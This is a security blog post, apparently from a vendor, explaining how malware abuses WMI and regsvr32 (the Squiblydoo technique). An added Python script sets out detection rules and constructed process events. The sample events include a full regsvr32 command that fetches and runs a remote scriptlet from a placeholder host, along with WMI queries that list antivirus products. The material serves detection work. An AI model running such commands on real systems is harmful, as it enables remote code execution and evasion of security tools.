This is the second in a series of blog posts covering some of the more common evasion techniques used by malware developers. Feel free to visit the first post, which deals with what is arguably the most widely used technique: sandbox evasion.
As mentioned in our previous post, modern malware doesn't break out and wreak havoc the moment it lands in your network. Instead, it usually employs a number of techniques in order to remain undetected by various security tools protecting the network.
This post discusses the "Living off the Land" technique.
What is Living off the Land?
Living off the Land, or LotL (sometimes LoL), is an evasion technique that takes advantage of trusted, built-in utilities, libraries, tools, and components that ship with the operating system (OS). Because this software is typically signed by the OS vendor, present on every machine, and expected to run, the operations it performs look legitimate even to careful security tooling, including when those operations are carried out on behalf of a threat actor. The detection problem is not the binary itself but the intent behind the arguments it is given.
System utilities, libraries, tools, and components used for Living off the Land are known as LOL binaries or, simply, LOLbins. Some of the most widely abused include PowerShell, rundll32.exe, regsvr32.exe, certutil.exe, wmic.exe, and schtasks.exe. The community-maintained LOLBAS project (https://lolbas-project.github.io/) catalogues these binaries and the functions each can be abused for.
Again, these are trusted programs with legitimate functions. So even if malware uses LOLbins to, for example, scan the environment for indicators of a virtual machine or sandbox, move laterally, download additional malicious artifacts, launch the next stage of an attack, exfiltrate data, and so on, there is a good chance these actions will be interpreted as normal administrative activity and, therefore, won't trigger alerts.
LotL is also useful against mitigations such as application allowlisting (whitelisting), which restricts execution to a set of trusted files, applications, and packages. An allowlist checks the executable being launched, and the LOLbin is on that list; it generally does not examine the arguments the binary receives, the script it is told to fetch, or (unless DLL rules are enabled) the library it is asked to load. Because LotL-capable malware runs its logic inside trusted, and usually digitally signed, software, it can slip past allowlisting and similar countermeasures unless the policy is also tuned to restrict what those binaries may be used for.
Let's now look at a couple of examples of LOLbins and how malware abuses them to carry out malicious actions while avoiding detection.
Abusing WMI for Living Off the Land evasion
WMI, which stands for Windows Management Instrumentation, is not just one LOLbin. It is a comprehensive management infrastructure that system administrators use to manage Windows systems locally or remotely, and it has shipped with every version of Windows since Windows 2000. The usual command-line entry points are wmic.exe and the PowerShell cmdlets Get-WmiObject and Get-CimInstance, but any program can reach WMI directly through COM. It is very powerful, supporting a wide range of actions, including changing security configuration, setting system properties, starting processes, scheduling tasks, and many more. So, if a threat actor manages to abuse this infrastructure, you can imagine the possibilities that become available.
Another major function of WMI is querying information about any WMI-managed object, such as running processes, registry keys, installed services, and files. So, for example, malware can query the AntiVirusProduct class in the root\SecurityCenter2 namespace, which is populated by Windows Security Center, to list the antivirus products registered on the system. (root\SecurityCenter2 is present on client editions of Windows but not on Windows Server, which has no Security Center service.)
It can also query classes in the root\cimv2 namespace, such as Win32_ComputerSystem (Manufacturer and Model) or Win32_BIOS, and look for strings such as "VirtualBox" or "VMware". As discussed in our previous post on sandbox evasion, if malware discovers signs of a security tool or sandbox, it may opt to remain inactive to avoid detection.
Evading application whitelists with the Regsvr32 LOLbin
Another often-abused LOLbin is regsvr32.exe, a digitally signed Windows utility normally used to register and unregister DLLs and ActiveX controls. It does this by loading the DLL into its own process and calling the library's DllRegisterServer or DllUnregisterServer export, which writes the COM registration to the Windows Registry. That mechanism is the whole problem: pointed at an attacker's DLL, regsvr32 loads it and runs its exported code inside a signed Microsoft process. Because regsvr32 itself is trusted, the files it executes and the modules it loads are usually ignored by allowlisting tools and other security solutions.
One particular attack known as Squiblydoo (publicised by Casey Smith in 2016 and since used by several malware families) takes evasion a step further. It abuses regsvr32's /i: switch, which passes an argument to the DLL's DllInstall export. With scrobj.dll (the Windows Script Component runtime) as the DLL, that argument can be a URL: scrobj.dll fetches the scriptlet (.sct) file from the remote server and executes the JScript or VBScript it contains. The /n switch skips DllRegisterServer and /u selects the uninstall path, so nothing is written to the registry, and /s keeps the whole thing silent. Since the script is hosted remotely and nothing is dropped to disk, the attack is practically fileless and, hence, even stealthier. It is not invisible, though: the full command line, including the URL, appears in process-creation logs, and the download appears in proxy logs. MITRE ATT&CK tracks this behaviour as T1218.010 (Regsvr32).
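The Python script below is an added example, not part of the original post and not Minerva's product code. It shows what the WMI reconnaissance described in the previous section and the regsvr32 abuse described here look like in process-creation telemetry, and a few starting rules a detection engineer could write against it. The events are constructed for illustration (the host 203.0.113.10, the user "alice" and all paths are placeholders); field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage), and the rule set is deliberately small rather than exhaustive.

```python
# Added example (not from the original post or Minerva's product): triage rules for
# LotL abuse of WMI and regsvr32 over process-creation telemetry.
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcessEvent:
    """Subset of Sysmon Event ID 1 / Windows 4688 fields."""
    image: str          # full path of the new process
    command_line: str
    parent_image: str   # full path of the parent process


@dataclass
class Finding:
    rule: str
    severity: str       # "high", "medium" or "low"


# Paths a normal user can write to; a DLL or parent process living here is a weak signal.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)|Users\\Public|ProgramData|Windows\\Temp)\\",
    re.IGNORECASE)
# regsvr32 /i:<url> hands the URL to the DLL's DllInstall export (scrobj.dll fetches and runs it).
REMOTE_SCRIPTLET = re.compile(r"/i:\s*\"?https?://", re.IGNORECASE)
# Classes in root\SecurityCenter2 that enumerate installed security products.
SECURITY_CENTER = re.compile(r"SecurityCenter2|AntiVirusProduct|AntiSpywareProduct|FirewallProduct",
                             re.IGNORECASE)
# root\cimv2 classes whose Manufacturer/Model/BIOS strings reveal VMware, VirtualBox, Hyper-V, etc.
VM_FINGERPRINT = re.compile(
    r"Win32_ComputerSystem|Win32_BIOS|Win32_DiskDrive|\b(computersystem|bios|diskdrive)\s+get\b",
    re.IGNORECASE)


def analyze(ev: ProcessEvent) -> List[Finding]:
    """Return the findings for one event; an empty list means nothing matched."""
    findings: List[Finding] = []
    image = ev.image.rsplit("\\", 1)[-1].lower()
    cmd = ev.command_line
    parent_untrusted = bool(USER_WRITABLE.search(ev.parent_image))

    if image == "regsvr32.exe":
        if REMOTE_SCRIPTLET.search(cmd) or "scrobj.dll" in cmd.lower():
            findings.append(Finding("regsvr32 running a remote scriptlet (Squiblydoo, T1218.010)", "high"))
        elif USER_WRITABLE.search(cmd):
            findings.append(Finding("regsvr32 loading a DLL from a user-writable path", "medium"))

    # WMI rules apply to any client (wmic.exe, PowerShell, ...): the query text is the signal.
    if SECURITY_CENTER.search(cmd):
        findings.append(Finding("WMI query of root\\SecurityCenter2 (security-product discovery)",
                                "high" if parent_untrusted else "medium"))
    elif VM_FINGERPRINT.search(cmd):
        findings.append(Finding("WMI hardware/BIOS query (possible VM or sandbox check)",
                                "medium" if parent_untrusted else "low"))
    return findings


def summarize(events: List[ProcessEvent]) -> Dict[str, int]:
    """Count findings by severity across a batch of events."""
    counts: Dict[str, int] = {}
    for ev in events:
        for f in analyze(ev):
            counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


# Constructed sample events (not real telemetry). The host 203.0.113.10 and all paths are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
                 r"C:\Program Files\Vendor\setup.exe"),                          # benign installer
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32 /s /n /u /i:http://203.0.113.10/update.sct scrobj.dll",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),  # Squiblydoo
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r'regsvr32.exe /s "C:\Users\alice\AppData\Local\Temp\x.dll"',
                 r"C:\Windows\System32\cmd.exe"),                                # dropped DLL
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe",
                 r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName",
                 r"C:\Users\alice\AppData\Local\Temp\invoice.exe"),              # AV discovery
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -c Get-CimInstance Win32_ComputerSystem | Select Manufacturer,Model",
                 r"C:\Windows\explorer.exe"),                                    # VM check
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe",
                 r"wmic computersystem get manufacturer,model",
                 r"C:\Windows\System32\cmd.exe"),                                # admin at a console
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for f in analyze(ev):
            print(f"[{f.severity:>6}] {f.rule}: {ev.command_line}")
```

Two design points. First, the WMI rules key on the query text rather than on wmic.exe, because the same query arrives through PowerShell, cscript, or any compiled client; a binary that calls WMI through COM leaves no command line at all, and for that case you need the WMI-Activity event log or an EDR hook, not process telemetry. Second, the legitimate wmic.exe hardware query from a console is kept as a low-severity finding rather than dropped: the value is in the parent-process context, which is why the same query from a binary in a Temp directory is raised to medium.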
Countering LotL with Minerva
Living off the Land techniques rely on trusted, legitimate system tools that are abused to let threat actors evade detection. Minerva's Living off the Land Prevention module uses patented simulation technology to render these techniques ineffective by contextually hiding LOLbins, making it impossible for attackers to find them, let alone use them as a springboard for an attack.